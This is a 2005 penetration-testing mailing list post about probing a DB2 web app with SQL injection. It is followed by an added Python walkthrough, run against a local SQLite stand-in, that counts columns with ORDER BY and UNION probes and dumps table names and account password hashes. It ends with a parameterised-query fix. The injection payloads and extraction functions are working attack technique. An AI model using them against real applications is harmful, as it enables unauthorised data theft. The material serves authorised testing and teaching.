SQLInjecting DB2

From: Andres Molinetti (andymolinetti_at_hotmail.com)
Date: 02/16/05

Next message: John Madden: "Cryptocard database"
To: pen-test@securityfocus.com
Date: Wed, 16 Feb 2005 19:51:35 +0000


    Hi, I'm currently testing a Websphere/DB2 Web Application of one of our
    clients.
    I've found that it is vulnerable to SQL Injection.
    I 've also discovered that there is a table named SYSTABLES with a NAME
    column in it.

    Using the "GROUP by 1--" trick I've discovered two columns in the table over
    which the query is being executed.
    After doing "GROUP by A, B--", I get no more errors, so I assume that only
    these two columns are taking part in the query.. (is that ok?)

    Column A is probably CLOB or VARCHAR and B probably an INTEGER. (any way to
    confirm this?)

    I can say this because I've tried this query: ' AND A=CLOB('A')--
    and it returns no error
    when this one: ' AND A=BIGINT(132123)--
    returns error on type comparison

    So then I proceeded to do a: ' UNION ALL SELECT 1 FROM SYSTABLES--
    Then I get "Error 500: java.sql.SQLException: [SQL0415] UNION operands not
    compatible."

    I suppose that the column types are different.

    Anyway, I submit this query: ' UNION ALL SELECT 1,1 FROM SYSTABLES--
    Then I get "Error 500: java.sql.SQLException: [SQL0421] Number of UNION
    operands not equal."
    Meaning that the number of columns are not equal...

    Here are my questions:
    1). Is there any way to get the "original" table name (the one where the
    original query executes)?
    2). I've done a script that checks for different column numbers and it has
    already tested with about 200 columns, and it keeps saying that the number of
    operands is not equal. What could be happening?

    Any ideas would be greatly appreciated!!

    Thanks, Andy

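The column-count probing and UNION extraction discussed in the post above, as an added example that is not part of the original message. It uses Python with an in-memory SQLite database as a stand-in, since DB2 is not available offline; the schema, the `vulnerable_search` query, the `accounts` table and its rows are all constructed for illustration, and the DB2 catalog equivalents of `sqlite_master` (SYSCAT.TABLES on DB2 LUW, SYSIBM.SYSTABLES with its NAME column) are noted in comments rather than exercised.

```python
import sqlite3

# Constructed sample schema: a stand-in for the client's DB2 tables (assumption).
# SQLite is used only because it runs offline. The DB2 equivalents of
# sqlite_master are SYSCAT.TABLES (TABNAME) on DB2 LUW and SYSIBM.SYSTABLES (NAME).
SCHEMA = """
CREATE TABLE products (name TEXT, qty INTEGER, price REAL);
INSERT INTO products VALUES ('widget', 3, 9.5), ('gadget', 7, 19.0);
CREATE TABLE accounts (username TEXT, pwhash TEXT);
INSERT INTO accounts VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_search(conn, term):
    """Injectable query: the search term is concatenated into the WHERE clause,
    the pattern the post describes. Two columns are selected (A = name, B = qty)."""
    sql = f"SELECT name, qty FROM products WHERE name = '{term}'"
    return conn.execute(sql).fetchall()


def safe_search(conn, term):
    """Hardened form: a bound parameter, so the term is data and never SQL."""
    return conn.execute(
        "SELECT name, qty FROM products WHERE name = ?", (term,)
    ).fetchall()


def probe_count_order_by(conn, max_cols=64):
    """ORDER BY n probing: the first n that errors is one past the column count.
    Unlike GROUP BY, this needs no column names and fails at exactly ncols + 1."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(conn, f"' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def probe_count_union(conn, max_cols=64):
    """UNION probing with NULL placeholders, which are type-compatible with every
    column, so only the operand count can fail. (Older DB2 releases reject an
    untyped NULL in a select list; use CAST(NULL AS INTEGER) there.)"""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            vulnerable_search(conn, f"' UNION ALL SELECT {nulls}--")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract(conn, ncols, expr, source):
    """Put one expression in the first slot (the string-typed column A) and NULL
    in the rest, then UNION it onto the original query so the rows come back
    through the application's normal output."""
    slots = [expr] + ["NULL"] * (ncols - 1)
    payload = f"' UNION ALL SELECT {', '.join(slots)} FROM {source}--"
    rows = vulnerable_search(conn, payload)
    return sorted(r[0] for r in rows if r[0] is not None)


def dump_table_names(conn, ncols):
    # DB2 LUW equivalent: TABNAME FROM SYSCAT.TABLES WHERE TABSCHEMA = CURRENT SCHEMA
    return union_extract(conn, ncols, "name", "sqlite_master WHERE type = 'table'")


def dump_accounts(conn, ncols):
    # Concatenate so a single string slot carries two fields per row.
    return union_extract(conn, ncols, "username || ':' || pwhash", "accounts")


if __name__ == "__main__":
    db = make_db()
    n = probe_count_order_by(db)
    print("columns in injected query:", n, "(union probe:", probe_count_union(db), ")")
    print("tables:", dump_table_names(db, n))
    print("accounts:", dump_accounts(db, n))
    print("hardened query, same payload:", safe_search(db, "' UNION ALL SELECT NULL, NULL--"))
```

The ORDER BY probe and the NULL-padded UNION probe should agree on the count; when the UNION probe never succeeds for any reasonable count, the usual reason is that the injected text is not landing where assumed (the trailing comment is not terminating the rest of the statement, or the injection point sits inside a subquery with a different select list), so confirm the count with ORDER BY before spending time on more columns. Once the count is known, only the slot matching the original string column needs a real expression; the rest stay NULL (cast on DB2 where required). The `safe_search` variant shows the fix: with a bound parameter the same payload is just an unmatched search term.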

